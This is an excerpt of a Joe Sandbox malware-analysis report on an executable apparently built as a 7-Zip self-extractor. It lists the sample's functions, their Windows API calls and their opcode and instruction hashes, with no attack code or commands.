                                                                            • Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                            • Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669
                                                                            Function 0040CA73 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: FileTime
                                                                            • String ID:
                                                                            • API String ID: 1425588814-0
                                                                            • Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                            • Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
                                                                            • Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                            • Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02
                                                                            Function 0040CE83 Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID:
                                                                            • API String ID: 1033339047-0
                                                                            • Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                            • Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
                                                                            • Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                            • Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA
                                                                            Function 004032D9 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID:
                                                                            • API String ID: 1033339047-0
                                                                            • Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                            • Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
                                                                            • Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                            • Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D
                                                                            Function 0040C88E Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                            • Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
                                                                            • Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                            • Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98
                                                                            Function 00402739 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                            • Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
                                                                            • Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                            • Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509
                                                                            Function 00401CFA Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                            • Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
                                                                            • Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                            • Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09

                                                                            Non-executed Functions

                                                                            Function 0040385E Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wtol.MSVCRT ref: 00403882
                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
                                                                            • _wtol.MSVCRT ref: 00403A1C
                                                                            • CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                            • String ID: .lnk
                                                                            • API String ID: 408529070-24824748
                                                                            • Opcode ID: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
                                                                            • Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
                                                                            • Opcode Fuzzy Hash: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
                                                                            • Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18
                                                                            Function 00402187 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                            • wsprintfW.USER32 ref: 004021E7
                                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                            • GetLastError.KERNEL32 ref: 00402201
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                            • GetLastError.KERNEL32 ref: 00402236
                                                                            • lstrcmpiW.KERNEL32(00618E68,00404926), ref: 0040224B
                                                                            • ??3@YAXPAX@Z.MSVCRT(00618E68), ref: 0040225B
                                                                            • ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                            • SetLastError.KERNEL32(?), ref: 00402282
                                                                            • lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                            • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                            • _wtol.MSVCRT ref: 00402314
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00618E68,00000002), ref: 00402334
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                            • String ID: 7zSfxString%d
                                                                            • API String ID: 2117570002-3906403175
                                                                            • Opcode ID: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
                                                                            • Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
                                                                            • Opcode Fuzzy Hash: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
                                                                            • Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28
                                                                            Function 00401DC9 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                            • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                            • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                            • LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                            • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401E60
                                                                            • wsprintfW.USER32 ref: 00401E7F
                                                                            • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401E97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                            • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                            • API String ID: 2639302590-365843014
                                                                            • Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                            • Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
                                                                            • Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                            • Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8
                                                                            Function 00408DBF Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                            • GetLastError.KERNEL32 ref: 00408DF4
                                                                            • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                            • lstrlenW.KERNEL32(?), ref: 00408E44
                                                                            • lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                            • lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                            • LocalFree.KERNEL32(?), ref: 00408E9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                            • String ID:
                                                                            • API String ID: 829399097-0
                                                                            • Opcode ID: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
                                                                            • Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
                                                                            • Opcode Fuzzy Hash: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
                                                                            • Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4
                                                                            Function 00402EE6 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
                                                                            • lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
                                                                            • lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
                                                                            • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
                                                                            • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                            • String ID:
                                                                            • API String ID: 1862581289-0
                                                                            • Opcode ID: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
                                                                            • Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
                                                                            • Opcode Fuzzy Hash: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
                                                                            • Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68
                                                                            Function 00408630 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0040864F
                                                                            • SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00408669
                                                                            • SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
                                                                            • EndDialog.USER32(?,00000000), ref: 0040869A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentHookThreadWindows$Dialog
                                                                            • String ID:
                                                                            • API String ID: 1967849563-0
                                                                            • Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                            • Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
                                                                            • Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                            • Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C
                                                                            Function 0040244E Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
                                                                            • FreeSid.ADVAPI32(?), ref: 004024A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                            • Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
                                                                            • Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                            • Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69
                                                                            Function 0040AD30 Relevance: .5, Instructions: 479COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                            • Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
                                                                            • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                            • Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA
                                                                            Function 00413D43 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
